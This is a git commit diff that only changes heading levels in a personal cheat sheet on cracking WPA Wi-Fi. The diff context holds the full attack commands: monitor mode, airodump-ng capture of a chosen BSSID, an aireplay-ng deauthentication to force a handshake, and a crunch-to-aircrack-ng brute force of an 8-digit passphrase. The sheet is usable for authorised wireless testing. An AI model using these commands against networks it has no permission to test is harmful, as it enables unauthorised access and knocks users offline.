Update sections title
This commit is contained in:
parent
2637735f68
commit
5bd12c70c7
1 changed files with 7 additions and 7 deletions
|
@ -1,4 +1,4 @@
|
|||
# Monitor mode
|
||||
## Monitor mode
|
||||
For my RTL8188EUS:
|
||||
|
||||
```
|
||||
|
@ -6,7 +6,7 @@ ip link set wlanX down
|
|||
iw dev wlanX set type monitor
|
||||
```
|
||||
|
||||
# Scan networks
|
||||
## Scan networks
|
||||
|
||||
All channels:
|
||||
```
|
||||
|
@ -17,7 +17,7 @@ Specific channel:
|
|||
airodump-ng -c 6 wlanX
|
||||
```
|
||||
|
||||
# Save a capture of chosen BSSID
|
||||
## Save a capture of chosen BSSID
|
||||
|
||||
```
|
||||
airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
|
||||
|
@ -32,15 +32,15 @@ aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
|
|||
|
||||
Then you should have an EAPOL/WPA handshake.
|
||||
|
||||
# Crack WPA passphrase
|
||||
## Crack WPA passphrase
|
||||
|
||||
## For a 8 digits scheme
|
||||
### For a 8 digits scheme
|
||||
|
||||
```
|
||||
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
|
||||
```
|
||||
|
||||
# Wireshark
|
||||
## Wireshark
|
||||
|
||||
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
|
||||
|
||||
|
|
Loading…
Reference in a new issue